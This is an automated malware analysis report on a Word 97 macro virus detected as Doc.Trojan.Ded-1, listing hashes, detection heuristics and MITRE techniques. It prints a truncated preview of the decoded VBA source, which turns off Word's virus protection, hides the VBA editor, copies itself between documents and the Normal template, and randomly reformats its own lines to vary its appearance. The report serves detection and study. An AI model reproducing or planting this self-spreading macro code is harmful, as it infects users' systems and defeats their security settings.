Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ea7077056895add…

MALICIOUS

Office (OLE)

34.0 KB Created: 2001-09-04 11:08:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4383a6ddae3f87448b37db08c27d6913 SHA-1: e72200c7a09ac35029e145cda1ef54af7cf0dc1b SHA-256: 1ea7077056895addbd13695cf33cc54cba7584e976d3ab8c80010350708ceee5
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function, indicating an attempt to execute arbitrary code. The presence of the 'Doc.Trojan.Ded-1' ClamAV signature further confirms its malicious nature. The VBA code appears to be obfuscated and attempts to disable virus protection and hide the Visual Basic Editor, consistent with malware designed to evade detection and download further stages.

Heuristics 5

  • ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19446 bytes
SHA-256: c79d528c1825d7436361cbe72405ac825d69aaeb182d315f966ad34688acbbc1
Detection
ClamAV: Doc.Trojan.Ded-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
            Private Sub _
Document_Close()

         On Error GoTo _
skam

    Options.VirusProtection _
= False

    SWL
'40.13744
          ABS99
'41.27668
skam:
'58.3359
         End Sub
'91.93771
   Private Sub Èäåíòèôèêàòîð()
'47.44592
 End Sub
'39.04715
           Private Sub Document_New()
'8.964139
  End Sub
'58.97926
     Private Sub SWL()
'25.46019
              Application. _
                                                          ShowVisualBasicEditor = False

     If _
Not ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

             For I = _
1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines

            d _
= NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

        If Len(d) _
> 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

       While _
Mid(d, Len(d) - 1, 2) = " _"

     I = I + 1
'58.45293
  d _
= Left(d, Len(d) - 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

  Wend
'78.21387
 d = e(d)
'46.3584
          ActiveDocument. _
                               VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

          End If
'80.25874
              Next _
I

  ActiveDocument. _
                                            SaveAs AddToRecentFiles:=False

          End If
'44.11147
  End _
Sub

Private Sub ABS99()
'40.16046
      If _
Not NormalTemplate.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

             f (NormalTemplate. _
FullName)

            For I = 1 To _
ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

 d _
= ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

             If Len(d) > 0 _
And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

       While Mid(d, Len(d) - _
1, 2) = " _"

  I = I _
+ 1

  d = Left(d, Len(d) _
- 1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

  Wend
'72.94109
            d = e(d)
'55.51133
            NormalTemplate. _
            VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

          End If
'33.90907
    Next _
I

           NormalTemplate. _
                            Save

     End If
'28.13814
       End Sub
'26.80438
    Private Function e(aString) As _
String

aString = LTrim(aString)
'96.4709
    aString _
= RTrim(aString)

            If aString _
= "Sub " & "Vc()" Then

aString = "Sub " & "ViewVBCode()"
'13.9438
  Else
'42.49291
 If aString _
= "Sub " & "ViewVBCode()" Then

  aString _
= "Sub " & "Vc()"

            End If
'30.66294
      End If
'49.33584
         For I = 1 _
To Len(aString) - 1

              If Mid(aString, _
I, 1) = "." Then

If _
Not Mid(aString, I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then

  If _
Not Mid(aString, I + 1, 1) = Chr$(34) Then

 e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)

     For _
j = 1 To Int(15 * Rnd)

             e = " " & e
'46.8736
        Next j
'80.70413
   Exit Function
'32.68447
         End If
'58.99297
    End If
'58.3927
Else
'38.75368
              If _
Mid(aString, I, 1) = " " And Int(3 * Rnd) = 1 And I > 1 Then

          If Not _
Mid(aString, I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then

         e = Left(aString, _
I - 1) & " _" & Chr$(13) & Right(aString, Len(aString) - I)

            For _
j = 1 To Int(15 * Rnd)

         e = " " & _
e

     Next j
'29.1052
      Exit Function
'76.98775
        End If
'17.76208
 End If
'43.15423
 End _
If

       Next I
... (truncated)